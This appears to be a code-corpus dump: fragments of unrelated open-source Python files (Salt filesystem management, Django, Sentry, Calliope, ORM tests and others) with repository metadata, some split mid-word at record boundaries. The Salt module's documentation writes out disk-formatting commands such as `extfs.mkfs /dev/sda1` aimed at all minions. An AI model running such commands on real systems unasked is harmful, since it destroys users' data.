alphas=alphas, eps_L=eps_L)
for f, v in zip(curve_fluo, curve_volume)]
return zip(*results)
if alphas is None: alphas = DEFAULT_ALPHAS
tt_fluo= curve_fluo.x
H_ic = np.exp(-degr*tt_fluo).reshape((len(tt_fluo),1))
model = lambda Y,t: 1 - degr*Y
dtau = ttu[1]-ttu[0]
m = odeint(model,0,[0,dtau]).flatten()[1]
TT = (ttu-np.array([tt_fluo]).T)
H_u = (m*np.exp(degr*TT)*(TT<0)) * curve_volume(ttu + dtau/2)
H = np.hstack([H_ic, H_u])
activity, fluo_smooth, ic, alpha, ascores = \
infer_control(H, y= curve_fluo.y, Nic= 1, alphas= alphas,
eps_L = eps_L)
return ( Curve(ttu, activity),
Curve(tt_fluo, fluo_smooth),
ic, alpha, ascores )
def ilp_concentration(curve_fluo, curve_volume, ttu, dR, dP,
alphas=None, eps_L=0.0001):
""" Retrieves the concentration of a protein P, given
the fluorescence of reporter R.
Parameters
-----------
curve_fluo
A curve instance representing the measured fluorescence
(proportional to the quantities of reporter)
curve_volume
Volume of the population.
dR
Degradation rate of the reporter
dP
Degradation rate of the proteins.
alphas
Smoothing parameters to be tested.
eps_L
Negligible factor for the derivation matrix.
"""
if isinstance(curve_fluo, list):
results = [ilp_concentration(f, v, ttu, dR, dP,
alphas=alphas, eps_L=eps_L)
for f, v in zip(curve_fluo, curve_volume)]
return zip(*results)
tt = curve_fluo.x
deltatau = ttu[1]-ttu[0]
dT = np.array([tt]).T-ttu
dTlz = dT >= 0 # ti-tj > 0
dTlzsdtau = dTlz*(dT < deltatau) # 0 < ti-tj < delta_tau
A = np.exp(dR*np.minimum(deltatau, dT)) - 1
B = dTlz*np.exp(dT*(-dR))*(dP-dR)/dR
Hu = (dTlzsdtau + A*B)*curve_volume(ttu+deltatau/2)
Hic = np.array([np.exp(-dR*tt)]).reshape((len(tt),1))
H = np.hstack([Hic, Hu])
p_est, f_est, ic, a, ascores = infer_control(
H, curve_fluo.y, 1, alphas=alphas, eps_L=eps_L)
return (Curve(ttu, p_est),
Curve(tt, f_est),
ic, a, ascores )
|
saltstack/salt
|
salt/modules/extfs.py
|
Python
|
apache-2.0
| 8,988
| 0.000111
|
"""
Module for managing ext2/3/4 file systems
"""
import logging
import salt.utils.platform
log = logging.getLogger(__name__)
def __virtual__():
"""
Only work on POSIX-like systems
"""
if salt.utils.platform.is_windows():
return (
False,
"The extfs execution module cannot be loaded: only available on "
"non-Windows systems.",
)
return True
def mkfs(device, fs_type, **kwargs):
"""
Create a file system on the specified device
CLI Example:
.. code-block:: bash
salt '*' extfs.mkfs /dev/sda1 fs_type=ext4 opts='acl,noexec'
Valid options are:
* **block_size**: 1024, 2048 or 4096
* **check**: check for bad blocks
* **direct**: use direct IO
* **ext_opts**: extended file system options (comma-separated)
* **fragment_size**: size of fragments
* **force**: setting force to True will cause mke2fs to specify the -F
option twice (it is already set once); this is truly dangerous
* **blocks_per_group**: number of blocks in a block group
* **number_of_groups**: ext4 option for a virtual block group
* **bytes_per_inode**: set the bytes/inode ratio
* **inode_size**: size of the inode
* **journal**: set to True to create a journal (default on ext3/4)
* **journal_opts**: options for the fs journal (comma separated)
* **blocks_file**: read bad blocks from file
* **label**: label to apply to the file system
* **reserved**: percentage of blocks reserved for super-user
* **last_dir**: last mounted directory
* **test**: set to True to not actually create the file system (mke2fs -n)
* **number_of_inodes**: override default number of inodes
* **creator_os**: override "creator operating system" field
* **opts**: mount options (comma separated)
* **revision**: set the filesystem revision (default 1)
* **super**: write superblock and group descriptors only
* **fs_type**: set the filesystem type (REQUIRED)
* **usage_type**: how the filesystem is going to be used
* **uuid**: set the UUID for the file system
See the ``mke2fs(8)`` manpage for a more complete description of these
options.
"""
kwarg_map = {
"block_size": "b",
"check": "c",
"direct": "D",
"ext_opts": "E",
"fragment_size": "f",
"force": "F",
"blocks_per_group": "g",
"number_of_groups": "G",
"bytes_per_inode": "i",
"inode_size": "I",
"journal": "j",
"journal_opts": "J",
"blocks_file": "l",
"label": "L",
"reserved": "m",
"last_dir": "M",
"test": "n",
"number_of_inodes": "N",
"creator_os": "o",
"opts": "O",
"revision": "r",
"super": "S",
"usage_type": "T",
"uuid": "U",
}
opts = ""
for key in kwargs:
if key in kwarg_map:
opt = kwarg_map[key]
if kwargs[key] == "True":
opts += "-{} ".format(opt)
else:
opts += "-{} {} ".format(opt, kwargs[key])
cmd = "mke2fs -F -t {} {}{}".format(fs_type, opts, device)
out = __salt__["cmd.run"](cmd, python_shell=False).splitlines()
ret = []
for line in out:
if not line:
continue
elif line.startswith("mke2fs"):
continue
elif line.startswith("Discarding device blocks"):
continue
elif line.startswith("Allocating group tables"):
continue
elif line.startswith("Writing inode tables"):
continue
elif line.startswith("Creating journal"):
continue
elif line.startswith("Writing superblocks"):
continue
ret.append(line)
return ret
def tune(device, **kwargs):
"""
Set attributes for the specified device (using tune2fs)
CLI Example:
.. code-block:: bash
salt '*' extfs.tune /dev/sda1 force=True label=wildstallyns opts='acl,noexec'
Valid options are:
* **max**: max mount count
* **count**: mount count
* **error**: error behavior
* **extended_opts**: extended options (comma separated)
* **force**: force, even if there are errors (set to True)
* **group**: group name or gid that can use the reserved blocks
* **interval**: interval between checks
* **journal**: set to True to create a journal (default on ext3/4)
* **journal_opts**: options for the fs journal (comma separated)
* **label**: label to apply to the file system
* **reserved**: percentage of blocks reserved for super-user
* **last_dir**: last mounted directory
* **opts**: mount options (comma separated)
* **feature**: set or clear a feature (comma separated)
* **mmp_check**: mmp check interval
* **reserved**: reserved blocks count
* **quota_opts**: quota options (comma separated)
* **time**: time last checked
* **user**: user or uid who can use the reserved blocks
* **uuid**: set the UUID for the file system
See the ``mke2fs(8)`` manpage for a more complete description of these
options.
"""
kwarg_map = {
"max": "c",
"count": "C",
"error": "e",
"extended_opts": "E",
"force": "f",
"group": "g",
"interval": "i",
"journal": "j",
"journal_opts": "J",
"label": "L",
"last_dir": "M",
"opts": "o",
"feature": "O",
"mmp_check": "p",
"reserved": "r",
"quota_opts": "Q",
"time": "T",
"user": "u",
"uuid": "U",
}
opts = ""
for key in kwargs:
if key in kwarg_map:
opt = kwarg_map[key]
if kwargs[key] == "True":
opts += "-{} ".format(opt)
else:
opts += "-{} {} ".format(opt, kwargs[key])
cmd = "tune2fs {}{}".format(opts, device)
out = __salt__["cmd.run"](cmd, python_shell=False).splitlines()
return out
def attributes(device, args=None):
"""
Return attributes from dumpe2fs for a specified device
CLI Example:
.. code-block:: bash
salt '*' extfs.attributes /dev/sda1
"""
fsdump = dump(device, args)
return fsdump["attributes"]
def blocks(device, args=None):
"""
Return block and inode info from dumpe2fs for a specified device
CLI Example:
.. code-block:: bash
salt '*' extfs.blocks /dev/sda1
"""
fsdump = dump(device, args)
return fsdump["blocks"]
def dump(device, args=None):
"""
Return all contents of dumpe2fs for a specified device
CLI Example:
.. code-block:: bash
salt '*' extfs.dump /dev/sda1
"""
cmd = "dumpe2fs {}".format(device)
if args:
cmd = cmd + " -" + args
ret = {"attributes": {}, "blocks": {}}
out = __salt__["cmd.run"](cmd, python_shell=False).splitlines()
mode = "opts"
group = None
for line in out:
if not line:
continue
if line.startswith("dumpe2fs"):
continue
if mode == "opts":
line = line.replace("\t", " ")
comps = line.split(": ")
if line.startswith("Filesystem features"):
ret["attributes"][comps[0]] = comps[1].split()
elif line.startswith("Group") and not line.startswith(
"Group descriptor size"
):
mode = "blocks"
else:
if len(comps) < 2:
continue
ret["attributes"][comps[0]] = comps[1].strip()
if mode == "blocks":
if line.startswith("Group"):
line = line.replace(":", "")
line = line.replace("(", "")
line = line.replace(")", "")
line = line.replace("[", "")
line = line.replace("]", "")
comps = line.split()
blkgrp = comps[1]
group
|
= "Group {}".format(blkgrp)
ret["
|
blocks"][group] = {}
ret["blocks"][group]["group"] = blkgrp
ret["blocks"][gro
|
lopiola/integracja_wypadki
|
scripts/statistics/speed_limit_exceeded_by_hour.py
|
Python
|
mit
| 817
| 0
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from scripts.db_api import accident
def usa_query(hour):
return '''
SELECT count(*), (select count(*) from accident
join vehicle on(acc_id = accident.id)
where country = 'USA'
and vehicle.speed > accident.speed_limit
and vehicle.speed > -1
and accident.speed_limit > 0
and date_part('hour', timestamp) = {0}) as exceeded
from accident
where country = 'USA' and date_part('hour', timestamp) = {0};
'''.format(hour)
def get_value(ag
|
e, dictionary):
if age no
|
t in dictionary:
return 0
return dictionary[age]
if __name__ == '__main__':
print('HOUR\tALL\tEXCEEDED')
for i in xrange(0, 24):
usa_count = accident.execute_query(usa_query(i))
print('{0}\t{1}\t{2}'.format(i, usa_count[0][0], usa_count[0][1]))
|
lantip/sms-komunitas
|
medkom/message/migrations/0001_initial.py
|
Python
|
gpl-3.0
| 1,783
| 0.002804
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('member', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Broadcast',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', mo
|
dels.CharField(max_length=20)),
('phone', models.CharField(max_length=15)),
],
),
migrations.CreateModel(
name='Log',
fields=[
(
|
'id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('date', models.DateTimeField()),
('message', models.CharField(max_length=200)),
('persons', models.ManyToManyField(to='member.Person')),
],
),
migrations.CreateModel(
name='Queue',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('date', models.DateTimeField()),
('sender', models.CharField(max_length=20)),
('message', models.CharField(max_length=200)),
('status', models.IntegerField(default=0, choices=[(0, b'Moderated'), (1, b'Pending'), (3, b'Spam')])),
('resolution', models.IntegerField(null=True, choices=[(0, b'Approved'), (1, b'Decline')])),
],
),
migrations.AddField(
model_name='log',
name='queue',
field=models.ForeignKey(blank=True, to='message.Queue', null=True),
),
]
|
torgartor21/solar
|
solar/solar/test/test_orm.py
|
Python
|
apache-2.0
| 15,583
| 0.000385
|
# Copyright 2015 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from .base import BaseResourceTest
from solar.core import resource
from solar.core import signals
from solar import errors
from solar.interfaces import orm
from solar.interfaces.db import base
class TestORM(BaseResourceTest):
def test_no_collection_defined(self):
with self.assertRaisesRegexp(NotImplementedError, 'Collection is required.'):
class TestDBObject(orm.DBObject):
__metaclass__ = orm.DBObjectMeta
def test_has_primary(self):
with self.assertRaisesRegexp(errors.SolarError, 'Object needs to have a primary field.'):
class TestDBObject(orm.DBObject):
_collection = base.BaseGraphDB.COLLECTIONS.resource
__metaclass__ = orm.DBObjectMeta
test1 = orm.db_field(schema='str')
def test_no_multiple_primaries(self):
with self.assertRaisesRegexp(errors.SolarError, 'Object cannot have 2 primary fields.'):
class TestDBObject(orm.DBObject):
_collection = base.BaseGraphDB.COLLECTIONS.resource
__metaclass__ = orm.DBObjectMeta
test1 = orm.db_field(schema='str', is_primary=True)
test2 = orm.db_field(schema='str', is_primary=True)
def test_primary_field(self):
class TestDBObject(orm.DBObject):
_collection = base.BaseGraphDB.COLLECTIONS.resource
__metaclass__ = orm.DBObjectMeta
test1 = orm.db_field(schema='str', is_primary=True)
t = TestDBObject(test1='abc')
self.assertEqual('test1', t._primary_field.name)
self.assertEqual('abc', t._db_key)
t = TestDBObject()
self.assertIsNotNone(t._db_key)
self.assertIsNotNone(t.test1)
def test_default_value(self):
class TestDBObject(orm.DBObject):
_collection = base.BaseGraphDB.COLLECTIONS.resource
__metaclass__ = orm.DBObjectMeta
test1 = orm.db_field(schema='str',
is_primary=True,
default_value='1')
t = TestDBObject()
self.assertEqual('1', t.test1)
def test_field_validation(self):
class TestDBObject(orm.DBObject):
_collection = base.BaseGraphDB.COLLECTIONS.resource
__metaclass__ = orm.DBObjectMeta
id = orm.db_field(schema='str', is_primary=True)
t = TestDBObject(id=1)
with self.assertRaises(errors.ValidationError):
t.validate()
t = TestDBObject(id='1')
t.validate()
def test_dynamic_schema_validation(self):
class TestDBObject(orm.DBObject):
_collection = base.BaseGraphDB.COLLECTIONS.resource
__metaclass__ = orm.DBObjectMeta
id = orm.db_field(schema='str', is_primary=True)
schema = orm.db_field()
value = orm.db_field(schema_in_field='schema')
t = TestDBObject(id='1', schema='str', value=1)
with self.assertRaises(errors.ValidationError):
t.validate()
self.assertEqual(t._fields['value'].schema, t._fields['schema'].value)
t = TestDBObject(id='1', schema='int', value=1)
t.validate()
self.assertEqual(t._fields['value'].schema, t._fields['schema'].value)
def test_unknown_fields(self):
class TestDBObject(orm.DBObject):
_collection = base.BaseGraphDB.COLLECTIONS.resource
__metaclass__ = orm.DBObjectMeta
id = orm.db_field(schema='str', is_primary=True)
with self.assertRaisesRegexp(errors.SolarError, 'Unknown fields .*iid'):
TestDBObject(iid=1)
def test_equality(self):
class TestDBObject(orm.DBObject):
_collection = base.BaseGraphDB.COLLECTIONS.resource
__metaclass__ = orm.DBObjectMeta
id = orm.db_field(schema='str', is_primary=True)
test = orm.db_field(schema='str')
t1 = TestDBObject(id='1', test='test')
t2 = TestDBObject(id='2', test='test')
self.assertNotEqual(t1, t2)
t2 = TestDBObject(id='1', test='test2')
self.assertNotEqual(t1, t2)
t2 = TestDBObject(id='1', test='test')
self.assertEqual(t1, t2)
class TestORMRelation(BaseResourceTest):
def test_children_value(self):
class TestDBRelatedObject(orm.DBObject):
_collection = base.BaseGraphDB.COLLECTIONS.input
__metaclass__ = orm.DBObjectMeta
id = orm.db_field(schema='str', is_primary=True)
class TestDBObject(orm.DBObject):
_collection = base.BaseGraphDB.COLLECTIONS.resource
__metaclass__ = orm.DBObjectMeta
id = orm.db_field(schema='str', is_primary=True)
related = orm.db_related_field(
base.BaseGraphDB.RELATION_TYPES.resource_input,
TestDBRelatedObject
)
r1 = TestDBRelatedObject(id='1')
r1.save()
r2 = TestDBRelatedObject(id='2')
r2.save()
o = TestDBObject(id='a')
o.save()
self.assertSetEqual(o.related.as_set(), set())
o.related.add(r1)
self.assertSetEqual(o.related.as_set(), {r1})
o.related.add(r2)
self.assertSetEqual(o.related.as_set(), {r1, r2})
o.related.remove(r2)
self.assertSetEqual(o.related.as_set(), {r1})
o.related.add(r2)
self.assertSetEqual(o.related.as_set(), {r1, r2})
o.related.remove(r1, r2)
self.assertSetEqual(o.related.as_set(), set())
o.related.add(r1, r2)
self.assertSetEqual(o.related.as_set(), {r1, r2})
with self.assertRaisesRegexp(errors.SolarError, '.*incompatible type.*'):
o.related.add(o)
def test_relation_to_self(self):
class TestDBObject(orm.DBObject):
_collection = base.BaseGraphDB.COLLECTIONS.input
__metaclass__ = orm.DBObjectMeta
id = orm.db_field(schema='str', is_primary=True)
related = orm.db_related_field(
base.BaseGraphDB.RELATION_TYPES.input_to_input,
'TestDBObject'
)
o1 = TestDBObject(id='1')
o1.save()
o2 = TestDBObject(id='2')
o2.save()
o3 = TestDBObject(id='2')
o3.save()
o1.related.add(o2)
o2.related.add(o3)
self.assertEqual(o1.related.as_set(), {o2})
self.assertEqual(o2.related.as_set(), {o3})
class TestResourceORM(BaseResourceTest):
def test_s
|
ave(self):
r = orm.DBResource(id='test1', name='test1', base_path='x')
|
r.save()
rr = resource.load(r.id)
self.assertEqual(r, rr.db_obj)
def test_add_input(self):
r = orm.DBResource(id='test1', name='test1', base_path='x')
r.save()
r.add_input('ip', 'str!', '10.0.0.2')
self.assertEqual(len(r.inputs.as_set()), 1)
def test_delete_resource(self):
r = orm.DBResource(id='test1', name='test1', base_path='x')
r.save()
r.add_input('ip', 'str!', '10.0.0.2')
class TestResourceInputORM(BaseResourceTest):
def test_backtrack_simple(self):
sample_meta_dir = self.make_resource_meta("""
id: sample
handler: ansible
version: 1.0.0
input:
value:
schema: str!
value:
""")
sample1 = self.create_resource(
'sample1', sample_meta_dir, {'value': 'x'}
)
sample2 = self.create_resource(
'sample2', sample_meta_dir, {'value': 'y'}
)
sample3 = self.create_res
|
hongliang5623/sentry
|
src/sentry/api/endpoints/project_tagkey_values.py
|
Python
|
bsd-3-clause
| 1,277
| 0
|
from __future__ import absolute_import
from sentry.api.base import DocSection
from sentry.api.bases.project import ProjectEndpoint
from sentry.api.exceptions import ResourceDoesNotExist
from sentry.api.serializers import serialize
|
from sentry.models import TagKey, TagKeyStatus, TagVa
|
lue
class ProjectTagKeyValuesEndpoint(ProjectEndpoint):
doc_section = DocSection.PROJECTS
def get(self, request, project, key):
"""
List a tag's values
Return a list of values associated with this key.
{method} {path}
"""
if key in ('release', 'user', 'filename', 'function'):
lookup_key = 'sentry:{0}'.format(key)
else:
lookup_key = key
try:
tagkey = TagKey.objects.get(
project=project,
key=lookup_key,
status=TagKeyStatus.VISIBLE,
)
except TagKey.DoesNotExist:
raise ResourceDoesNotExist
queryset = TagValue.objects.filter(
project=project,
key=tagkey.key,
)
return self.paginate(
request=request,
queryset=queryset,
order_by='-id',
on_results=lambda x: serialize(x, request.user),
)
|
lahwaacz/wiki-scripts
|
ws/checkers/CheckerBase.py
|
Python
|
gpl-3.0
| 3,021
| 0.001655
|
#! /usr/bin/env python3
import contextlib
import threading
import mwparserfromhell
import ws.ArchWiki.lang as lang
from ws.utils import LazyProperty
from ws.parser_helpers.title import canonicalize
from ws.parser_helpers.wikicode import get_parent_wikicode, get_adjacent_node
__all__ = ["get_edit_summary_tracker", "localize_flag", "CheckerBase"]
# WARNING: using the context manager is not thread-safe
def get_edit_summary_tracker(wikicode, summary_parts):
@contextlib.contextmanager
def checker(summary):
text = str(wikicode)
try:
yiel
|
d
finally:
if text != str(wikicode):
summary_parts.append(summary)
return checker
def localize_flag(wikicode, node,
|
template_name):
"""
If a ``node`` in ``wikicode`` is followed by a template with the same base
name as ``template_name``, this function changes the adjacent template's
name to ``template_name``.
:param wikicode: a :py:class:`mwparserfromhell.wikicode.Wikicode` object
:param node: a :py:class:`mwparserfromhell.nodes.Node` object
:param str template_name: the name of the template flag, potentially
including a language name
"""
parent = get_parent_wikicode(wikicode, node)
adjacent = get_adjacent_node(parent, node, ignore_whitespace=True)
if isinstance(adjacent, mwparserfromhell.nodes.Template):
adjname = lang.detect_language(str(adjacent.name))[0]
basename = lang.detect_language(template_name)[0]
if canonicalize(adjname) == canonicalize(basename):
adjacent.name = template_name
class CheckerBase:
def __init__(self, api, db, *, interactive=False, **kwargs):
self.api = api
self.db = db
self.interactive = interactive
# lock used for synchronizing access to the wikicode AST
# FIXME: the lock should not be an attribute of the checker, but of the wikicode
# maybe we can create a wrapper class (e.g. ThreadSafeWikicode) which would transparently synchronize all method calls: https://stackoverflow.com/a/17494777
# (we would still have to manually lock for wrapper functions and longer parts in the checkers)
self.lock_wikicode = threading.RLock()
@LazyProperty
def _alltemplates(self):
result = self.api.generator(generator="allpages", gapnamespace=10, gaplimit="max", gapfilterredir="nonredirects")
return {page["title"].split(":", maxsplit=1)[1] for page in result}
def get_localized_template(self, template, language="English"):
assert(canonicalize(template) in self._alltemplates)
localized = lang.format_title(template, language)
if canonicalize(localized) in self._alltemplates:
return localized
# fall back to English
return template
def handle_node(self, src_title, wikicode, node, summary_parts):
raise NotImplementedError("the handle_node method was not implemented in the derived class")
|
brynpickering/calliope
|
calliope/backend/checks.py
|
Python
|
apache-2.0
| 6,761
| 0.002219
|
"""
Copyright (C) 2013-2018 Calliope contributors listed in AUTHORS.
Licensed under the Apache 2.0 License (see LICENSE file).
run_checks.py
~~~~~~~~~~~~~
Checks for model consistency and possible errors when preparing run in the backend.
"""
import ruamel.yaml
import numpy as np
import pandas as pd
import xarray as xr
from calliope.core.attrdict import AttrDict
def check_operate_params(model_data):
"""
if model mode = `operate`, check for clashes in capacity constraints.
In this mode, all capacity constraints are set to parameters in the backend,
so can easily lead to model infeasibility if not checked.
Returns
-------
comments : AttrDict
debug output
warnings : list
possible problems that do not prevent the model run
from continuing
errors : list
serious issues that should raise a ModelError
"""
defaults = ruamel.yaml.load(model_data.attrs['defaults'], Loader=ruamel.yaml.Loader)
warnings, errors = [], []
comments = AttrDict()
def _get_param(loc_tech, var):
if _is_in(loc_tech, var) and not pd.isnull(model_data[var].loc[loc_tech].item()):
param = model_data[var].loc[loc_tech].item()
else:
param = defaults[var]
return param
def _is_in(loc_tech, set_or_var):
try:
model_data[set_or_var].loc[loc_tech]
return True
except (KeyError, AttributeError):
return False
for loc_tech in model_data.loc_techs.values:
energy_cap = model_data.energy_cap.loc[loc_tech].item()
# Must have energy_cap defined for all relevant techs in the model
if (pd.isnull(energy_cap) or np.isinf(energy_cap)) and not _is_in(loc_tech, 'force_resource'):
errors.append(
'Operate mode: User must define a finite energy_cap (via '
'energy_cap_equals or energy_cap_max) for {}'.format(loc_tech)
)
elif _is_in(loc_tech, 'loc_techs_finite_resource'):
# force resource overrides capacity constraints, so set capacity constraints to infinity
if _is_in(loc_tech, 'force_resource'):
if not _is_in(loc_tech, 'loc_techs_store'):
energy_cap = model_data.energy_cap.loc[loc_tech] = np.inf
warnings.append(
'Energy capacity constraint removed from {} as '
'force_resource is applied'.format(loc_tech)
)
if _is_in(loc_tech, 'resource_cap'):
print(loc_tech, model_data.resource_cap.loc_techs_supply_plus)
model_data.resource_cap.loc[loc_tech] = np.inf
warnings.append(
'Resource capacity constraint removed from {} as '
'force_resource is applied'.format(loc_tech)
)
# Cannot have infinite resource area (physically impossible)
if _is_in(loc_tech, 'loc_techs_area'):
area = model_data.resource_area.loc[loc_tech].item()
if pd.isnull(area) or np.isinf(area):
errors.append(
'Operate mode: User must define a finite resource_area '
'(via resource_area_equals or resource_area_max) for {}, '
'as a finite available resource is considered'.format(loc_tech)
)
# Cannot have consumed resource being higher than energy_cap, as
# constraints will clash. Doesn't affect supply_plus techs with a
# storage buffer prior to carrier production.
elif not _is_in(loc_tech, 'loc_techs_store'):
resource_scale = _get_param(loc_tech, 'resource_scale')
energy_cap_scale = _get_param(loc_tech, 'energy_cap_scale')
resource_eff = _get_param(loc_tech, 'resource_eff')
energy_eff = _get_param(loc_tech, 'energy_eff')
resource = model_data.resource.loc[loc_tech].v
|
alues
if (energy_cap is
|
not None and
any(resource * resource_scale * resource_eff >
energy_cap * energy_cap_scale * energy_eff)):
errors.append(
'Operate mode: resource is forced to be higher than '
'fixed energy cap for `{}`'.format(loc_tech)
)
if _is_in(loc_tech, 'loc_techs_store'):
if _is_in(loc_tech, 'charge_rate'):
storage_cap = model_data.storage_cap.loc[loc_tech].item()
if storage_cap and energy_cap:
charge_rate = model_data['charge_rate'].loc[loc_tech].item()
if storage_cap * charge_rate < energy_cap:
errors.append(
'fixed storage capacity * charge rate is not larger '
'than fixed energy capacity for loc::tech {}'.format(loc_tech)
)
# Must define a resource capacity to ensure the Pyomo param is created
# for it. But we just create an array of infs, so the capacity has no effect
if ('resource_cap' not in model_data.data_vars.keys() and
'loc_techs_supply_plus' in model_data.dims.keys()):
model_data['resource_cap'] = xr.DataArray(
[np.inf for i in model_data.loc_techs_supply_plus.values],
dims='loc_techs_supply_plus')
model_data['resource_cap'].attrs['is_result'] = 1
model_data['resource_cap'].attrs['operate_param'] = 1
warnings.append(
'Resource capacity constraint defined and set to infinity '
'for all supply_plus techs'
)
window = model_data.attrs.get('run.operation.window', None)
horizon = model_data.attrs.get('run.operation.horizon', None)
if not window or not horizon:
errors.append(
'Operational mode requires a timestep window and horizon to be '
'defined under run.operation'
)
elif horizon < window:
errors.append(
'Iteration horizon must be larger than iteration window, '
'for operational mode'
)
# Cyclic storage isn't really valid in operate mode, so we ignore it, using
# initial_storage instead (allowing us to pass storage between operation windows)
if model_data.attrs.get('run.cyclic_storage', True):
warnings.append(
'Storage cannot be cyclic in operate run mode, setting '
'`run.cyclic_storage` to False for this run'
)
model_data.attrs['run.cyclic_storage'] = False
return comments, warnings, errors
|
kret0s/gnuhealth-live
|
tryton/server/trytond-3.8.3/trytond/modules/health_history/report/__init__.py
|
Python
|
gpl-3.0
| 66
| 0.015152
|
# -*- coding:
|
utf-8 -*-
|
from patient_evaluation_report import *
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.